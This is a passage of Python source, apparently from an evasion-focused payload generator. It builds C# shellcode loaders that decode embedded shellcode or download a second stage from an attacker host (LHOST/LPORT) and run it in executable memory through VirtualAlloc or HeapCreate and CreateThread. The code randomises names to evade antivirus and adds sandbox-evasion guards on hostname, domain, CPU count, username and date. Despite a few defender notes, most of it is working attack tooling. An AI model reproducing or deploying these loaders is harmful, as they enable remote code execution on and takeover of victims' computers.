            if self.shellcode.msfvenompayload:
                self.payload_type = self.shellcode.msfvenompayload
            elif self.shellcode.payload_choice:
                self.payload_type = self.shellcode.payload_choice
                self.shellcode.payload_choice = ''
            # assume custom shellcode
            else:
                self.payload_type = 'custom'
        else:
            Shellcode = self.cli_shellcode
        # Base64 Encode Shellcode
        Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
        Shellcode = base64.b64encode(bytes(Shellcode,
                                           'latin-1')).decode('ascii')

        # randomize all our variable names, yo'
        namespaceName = evasion_helpers.randomString()
        className = evasion_helpers.randomString()
        bytearrayName = evasion_helpers.randomString()
        funcAddrName = evasion_helpers.randomString()
        shellcodeName = evasion_helpers.randomString()

        hThreadName = evasion_helpers.randomString()
        threadIdName = evasion_helpers.randomString()
        pinfoName = evasion_helpers.randomString()
        num_tabs_required = 0

        # get 12 random variables for the API imports
        r = [evasion_helpers.randomString() for x in range(12)]
        y = [evasion_helpers.randomString() for x in range(17)]

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
        payload_code += "namespace %s { class %s  {\n" % (namespaceName,
                                                          className)
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])
        payload_code += "static void Main() {\n"

        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2
        num_tabs_required += 2

        payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % (
            bytearrayName, Shellcode)

        payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % (
            bytearrayName)
        payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % (
            shellcodeName)
        payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % (
            shellcodeName)

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":

            payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, shellcodeName)
            payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                shellcodeName, funcAddrName, shellcodeName)
            payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName, threadIdName, pinfoName)
            payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (
                hThreadName)
            # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            rand_heap = evasion_helpers.randomString()
            rand_ptr = evasion_helpers.randomString()
            rand_var = evasion_helpers.randomString()

            payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                rand_heap, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                rand_ptr, rand_heap, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                rand_ptr, bytearrayName, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(
                rand_var)
            payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, rand_ptr, rand_var)
            payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(
                hThreadName)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Assemble C# source for this payload and store it on ``self.payload_source_code``.

        This method only builds a string; nothing is compiled or run here.
        The emitted program consists of:

        * a fetch routine that opens a TCP socket to the given host/port,
          reads a 4-byte length with ``BitConverter.ToInt32``, then receives
          that many bytes into a buffer starting at offset 5, and writes a
          5-byte prefix (``0xBF`` followed by the socket handle) into bytes 0..4;
        * an inject routine chosen by ``INJECT_METHOD``: ``virtual`` uses
          ``VirtualAlloc``/``Marshal.Copy``/``CreateThread``, ``heap`` uses
          ``HeapCreate``/``HeapAlloc``/``RtlMoveMemory``/``CreateThread``;
          both then block in ``WaitForSingleObject`` with a ``0xFFFFFFFF`` timeout;
        * a ``Main`` that first emits whatever ``gamemaker.senecas_games`` returns,
          then calls fetch with ``LHOST``/``LPORT`` and passes the result to inject;
        * the ``[DllImport("kernel32")]`` declarations, appended after ``Main``.

        Every C# identifier comes from ``helpers.randomString()``, so the source
        text differs on every run.  When ``USE_ARYA`` is ``y`` the finished source
        is passed through ``encryption.arya`` before being stored.

        Reads ``self.required_options`` keys ``INJECT_METHOD``, ``LHOST``,
        ``LPORT`` and ``USE_ARYA`` (each indexed ``[0]``); a missing key raises
        ``KeyError`` -- nothing here guards against that.  Returns ``None``.

        Defender note: the generated binary's observable behaviour is an outbound
        TCP connection followed by allocation of executable memory (``0x40``
        page protection on the ``virtual`` path, an executable heap on the
        ``heap`` path) and a new thread whose start address is inside that
        allocation -- the sequence a memory-scanning or ETW-based detection
        would key on.
        """

        # C# method names for the two routines emitted below (fetch, inject).
        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        # Namespace/class wrapper; both names are random per run.
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        # Local C# identifiers used inside the fetch routine.
        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()  # reassigned twice more below; see comments there
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        # --- fetch routine: static byte[] <getData>(string host, int port) ---
        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        # A failed Connect yields null; the inject routine checks for null before
        # doing anything with the buffer.
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        # 4-byte length prefix, decoded with BitConverter.ToInt32 (host byte order).
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        # Buffer is length + 5: received data lands at offset 5 onward, read in
        # chunks of at most 4096 bytes until `length` bytes have been received.
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        # Bytes 0..4 become 0xBF followed by the socket handle cast to int.
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # Fresh identifiers for the inject routine.  sName is reused here as the
        # routine's parameter name (a different C# identifier from the one above).
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        # --- inject routine: static void <inject>(byte[] buf) ---
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE (the names are
            # given in a commented-out line elsewhere in this file).
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            # The trailing "}}" closes the null-check and the routine.
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # pinfoName holds the heap handle and funcAddrName the allocation on
            # this path.  0x00040000 is HEAP_CREATE_ENABLE_EXECUTE and 0x00000008
            # is HEAP_ZERO_MEMORY (Win32 flag values; not named in this file).
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            # '}}}}' inside a .format() string is the literal "}}" (null-check + routine).
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # --- Main() ---
        # Third use of sName: now the buffer variable inside Main.
        sName = helpers.randomString()
        curlyCount = 0
        payload_code += "static void Main(){\n"

        # senecas_games returns extra C# to place at the top of Main plus the
        # number of '{' it leaves open; the curlyCount = 0 above is overwritten here.
        payload_code2, curlyCount = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        # LHOST is dropped verbatim into a C# string literal and LPORT into an
        # integer argument position; nothing here validates or escapes either.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        # The "}" on this line plus the loop below close the senecas_games
        # blocks and Main (curlyCount + 1 braces in total).
        payload_code += "    %s(%s); }\n" % (injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # P/Invoke declarations go after Main.  The virtual path uses 12 random
        # parameter names, the heap path 17; both lists are drawn regardless.
        # The trailing "}}" in each template closes the class and the namespace,
        # so an INJECT_METHOD other than virtual/heap leaves both unclosed.
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # Optional post-processing of the whole source text.
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Assemble C# source for this payload and store it on ``self.payload_source_code``.

        This method only builds a string; nothing is compiled or run here.
        The emitted program consists of:

        * a fetch routine that opens a TCP socket to the given host/port,
          reads a 4-byte length with ``BitConverter.ToInt32``, then receives
          that many bytes into a buffer starting at offset 5, and writes a
          5-byte prefix (``0xBF`` followed by the socket handle) into bytes 0..4;
        * an inject routine chosen by ``INJECT_METHOD``: ``virtual`` uses
          ``VirtualAlloc``/``Marshal.Copy``/``CreateThread``, ``heap`` uses
          ``HeapCreate``/``HeapAlloc``/``RtlMoveMemory``/``CreateThread``;
          both then block in ``WaitForSingleObject`` with a ``0xFFFFFFFF`` timeout;
        * a ``Main`` that wraps the fetch/inject calls in zero or more
          environment guards (``EXPIRE_PAYLOAD``, ``HOSTNAME``, ``DOMAIN``,
          ``PROCESSORS``, ``USERNAME``; the literal ``x`` disables a guard);
        * the ``[DllImport("kernel32")]`` declarations, appended after ``Main``.

        Unlike the sibling generator above, this one does not call
        ``gamemaker.senecas_games``; the guards are emitted inline here.
        Every C# identifier comes from ``helpers.randomString()``.  When
        ``USE_ARYA`` is ``y`` the finished source is passed through
        ``encryption.arya`` before being stored.

        Reads ``self.required_options`` keys ``INJECT_METHOD``, ``EXPIRE_PAYLOAD``,
        ``HOSTNAME``, ``DOMAIN``, ``PROCESSORS``, ``USERNAME``, ``LHOST``,
        ``LPORT`` and ``USE_ARYA`` (each indexed ``[0]``); a missing key raises
        ``KeyError``.  Option values are interpolated into the C# text verbatim,
        without validation or escaping.  Returns ``None``.

        Defender note: because the guards key on machine name, domain
        membership, processor count, user name and date, the generated binary
        may behave differently in an analysis sandbox than on the configured
        target; the network fetch and executable-memory allocation only occur
        once every enabled guard passes.
        """

        # C# method names for the two routines emitted below (fetch, inject).
        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        # Namespace/class wrapper; both names are random per run.
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        # Local C# identifiers used inside the fetch routine.
        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()  # reassigned twice more below; see comments there
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        # --- fetch routine: static byte[] <getData>(string host, int port) ---
        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        # A failed Connect yields null; the inject routine checks for null before
        # doing anything with the buffer.
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        # 4-byte length prefix, decoded with BitConverter.ToInt32 (host byte order).
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        # Buffer is length + 5: received data lands at offset 5 onward, read in
        # chunks of at most 4096 bytes until `length` bytes have been received.
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        # Bytes 0..4 become 0xBF followed by the socket handle cast to int.
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # Fresh identifiers for the inject routine.  sName is reused here as the
        # routine's parameter name (a different C# identifier from the one above).
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        # --- inject routine: static void <inject>(byte[] buf) ---
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE (the names are
            # given in a commented-out line elsewhere in this file).
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            # The trailing "}}" closes the null-check and the routine.
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # pinfoName holds the heap handle and funcAddrName the allocation on
            # this path.  0x00040000 is HEAP_CREATE_ENABLE_EXECUTE and 0x00000008
            # is HEAP_ZERO_MEMORY (Win32 flag values; not named in this file).
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            # '}}}}' inside a .format() string is the literal "}}" (null-check + routine).
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # --- Main(): environment guards, then fetch + inject ---
        # Third use of sName: now the buffer variable inside Main.
        # randomName is assigned but never used below.
        sName = helpers.randomString()
        randomName = helpers.randomString()
        # curlyCount tracks how many guard '{' are open so they can be closed
        # after the fetch/inject calls.  Each option uses the literal "x" to mean
        # "disabled"; each enabled guard opens one C# `if (...) {` and bumps it.
        curlyCount = 0
        payload_code += "static void Main(){\n"

        if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # Emits: today = DateTime.Today; expire = today.AddDays(N); if (expire < today) {
            # N is the raw EXPIRE_PAYLOAD value, inserted unvalidated.
            payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
                RandToday)
            payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
                RandExpire, RandToday,
                self.required_options["EXPIRE_PAYLOAD"][0])
            payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
                RandExpire, RandToday)

            # One more '{' to close at the end of Main.
            curlyCount += 1

        if self.required_options["HOSTNAME"][0].lower() != "x":

            # Substring match on the lower-cased machine name; the option value
            # lands inside a C# string literal without escaping.
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
                self.required_options["HOSTNAME"][0].lower())

            # One more '{' to close at the end of Main.
            curlyCount += 1

        if self.required_options["DOMAIN"][0].lower() != "x":

            # Plain string (not .format), hence the single '{'.  The DOMAIN value
            # itself is not used; the guard only tests MachineName != UserDomainName.
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'

            # One more '{' to close at the end of Main.
            curlyCount += 1

        if self.required_options["PROCESSORS"][0].lower() != "x":

            # PROCESSORS is inserted as a bare numeric comparison operand.
            payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
                self.required_options["PROCESSORS"][0])

            # One more '{' to close at the end of Main.
            curlyCount += 1

        if self.required_options["USERNAME"][0].lower() != "x":

            rand_user_name = helpers.randomString()
            rand_char_name = helpers.randomString()

            # Python '\\\\' becomes the C# char literal '\\' (a single backslash);
            # the guard then tests element [1] of the split, i.e. the part after
            # the first backslash, for the USERNAME substring.
            payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
                rand_user_name)
            payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
                rand_char_name, rand_user_name)
            payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
                rand_char_name, self.required_options["USERNAME"][0])

            # One more '{' to close at the end of Main.
            curlyCount += 1

        # LHOST is dropped verbatim into a C# string literal and LPORT into an
        # integer argument position; nothing here validates or escapes either.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        # The "}" on this line plus the loop below close the guards and Main
        # (curlyCount + 1 braces in total).
        payload_code += "    %s(%s); }\n" % (injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # P/Invoke declarations go after Main.  The virtual path uses 12 random
        # parameter names, the heap path 17; both lists are drawn regardless.
        # The trailing "}}" in each template closes the class and the namespace,
        # so an INJECT_METHOD other than virtual/heap leaves both unclosed.
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # Optional post-processing of the whole source text.
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return